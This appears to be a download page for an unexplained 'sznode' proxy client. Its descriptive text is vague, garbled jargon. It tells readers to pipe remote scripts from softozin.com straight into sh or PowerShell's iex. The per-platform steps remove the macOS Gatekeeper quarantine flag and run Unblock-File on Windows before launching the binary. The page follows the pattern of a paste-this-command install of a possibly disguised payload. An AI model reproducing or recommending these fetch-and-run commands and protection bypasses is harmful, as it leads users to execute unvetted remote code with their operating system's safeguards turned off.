Download Platform Clients
Download By One Command:
MAC / LINUX: curl -sSfL https://softozin.com/im | sh
WIN: powershell -c "irm https://softozin.com/iw | iex"
Execution Environment

Instantly access deployment file architectures and configure node proxy streams directly inside your local native terminal framework setup.

macOS Native Architecture
# 1. Download zip archive package curl -sSfL "https://node.softozin.com/download/sznode-mac.zip" -o "sznode-mac.zip" # 2. Extract compressed directory content unzip sznode-mac.zip # 3. Clear Apple Gatekeeper untrusted developer block xattr -d com.apple.quarantine sznode # 4. Initialize local proxy stream pipeline node ./sznode http 8080
macOS Binary
Windows x64 Native Binaries
# 1. Download windows client release layout configuration curl -sSfL "https://node.softozin.com/download/sznode-win-x64.zip" -o "sznode-win-x64.zip" # 2. Extract compressed setup folders Expand-Archive -Path .\sznode-win-x64.zip # 3. Unblock downloaded binary file safety constraints Unblock-File -Path .\sznode.exe # 4. Execute console engine deployment runtime sznode http 8080
Windows EXE
Linux Native Architecture
# 1. Download distribution zip container curl -sSfL "https://node.softozin.com/download/sznode-linux.zip" -o "sznode-linux.zip" # 2. Extract contents via deployment terminal unzip sznode-linux.zip # 3. Bootstrap environment deployment shell executable ./sznode http 8080
Linux Binary